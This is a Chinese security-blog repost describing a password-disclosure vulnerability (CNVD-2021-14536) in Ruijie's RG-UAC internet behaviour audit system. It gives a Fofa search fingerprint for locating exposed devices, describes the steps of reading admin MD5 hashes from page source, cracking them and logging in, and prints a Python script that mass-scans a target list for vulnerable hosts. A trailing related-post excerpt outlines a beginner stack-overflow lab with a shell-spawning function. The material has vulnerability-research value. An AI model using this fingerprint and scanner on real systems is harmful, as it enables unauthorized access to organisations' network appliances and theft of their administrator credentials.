锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞

admin 2021年11月29日16:49:32评论285 views字数 3037阅读10分7秒阅读模式

锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞

漏洞描述

锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露,可以间接获取用户账号密码信息登录后台

编号:CNVD-2021-14536

Fofa指纹

1
title="RG-UAC登录页面" && body="admin"

漏洞利用

image-20210308161840038

源代码搜索:

image-20210308161935213

MD5解密:

image-20210308162005706

登录成功

image-20210308162316216

自动化 POC

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47

import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarning

def title():
print('+------------------------------------------')
print('+ 33[34mPOC_Des: http://wiki.peiqi.tech 33[0m')
print('+ 33[34mVersion: 锐捷RG-UAC统一上网行为管理审计系统 33[0m')
print('+ 33[36m使用格式: python3 poc.py 33[0m')
print('+ 33[36mFile >>> ip.txt 33[0m')
print('+------------------------------------------')

def POC_1(target_url):
vuln_url = target_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
}
try:
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
response = requests.get(url=vuln_url, headers=headers, verify=False, timeout=5)
if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
print("33[32m[o] 目标 {}存在漏洞 ,F12查看源码获取密码md5值 33[0m".format(target_url))
else:
print("33[31m[x] 目标 {}不存在漏洞 33[0m".format(target_url))
except Exception as e:
print("33[31m[x] 目标 {}不存在漏洞 33[0m".format(target_url))

def Scan(file_name):
with open(file_name, "r", encoding='utf8') as scan_url:
for url in scan_url:
if url[:4] != "http":
url = "http://" + url
url = url.strip('n')
try:
POC_1(url)

except Exception as e:
print("33[31m[x] 请求报错 33[0m".format(e))
continue

if __name__ == '__main__':
title()
file_name = str(input("33[35mPlease input Attack FilenFile >>> 33[0m"))
Scan(file_name)

FROM : lintstar.top , Author: 离沫凌天๓

相关推荐: pwn初入门(一)

缓缓而行,步步攀登 一、内容前要 本节内容将为大家带来:一道入门级别的栈溢出pwn题环境搭建 二、准备阶段 代码准备 pwn1.c ```cpp include include int main() { char buf[80]; printf("input your key:n"); scanf("%s",buf); printf("%s",buf); return 0; } void shell() { system("/bin/sh"); } ``` 编译准备 bash gcc -fno-stack-protector pwn1.c -o pwn1 #关闭Canary保护 在线环境准备 bash git clone https://gitee.com/swh1te/ctf.git cd ./ctf/pwn1/ docker-compose up -d 环境搭建成功后,会将docker中的应用端口转发到本机的20001端口,可自行通过docker-compose.xml更改 三、分析阶段 基础信息查看 64位程序,没有开栈溢出保护,程序里存在system函数,也存在/bin/sh字符串 ```bash root@ubuntu:~/ctf/easy# file pwn1 pwn1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=0a4f59a9a0adb8f5efd0b1fe83e1caee7b784148, not stripped root@ubuntu:~/ctf/easy# checksec pwn1 [*] '/root/ctf/easy/pwn1' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) root@ubuntu:~/ctf/easy# strings pwn1|grep sh /bin/sh shell .shstrtab .gnu.hash root@ubuntu:~/ctf/easy# objdump -d pwn1|grep system 0000000004004e0 system@plt: 400674:e8 67 fe ff ff callq 4004e0 system@plt ``` gdb调试 通过peda的pattern_offset功能找到栈溢出的填充长度 ```bash gdb-peda$ pattern_create 200 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA' gdb-peda$ r Starting program: /root/ctf/easy/pwn1…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月29日16:49:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞http://cn-sec.com/archives/653345.html

发表评论

匿名网友 填写信息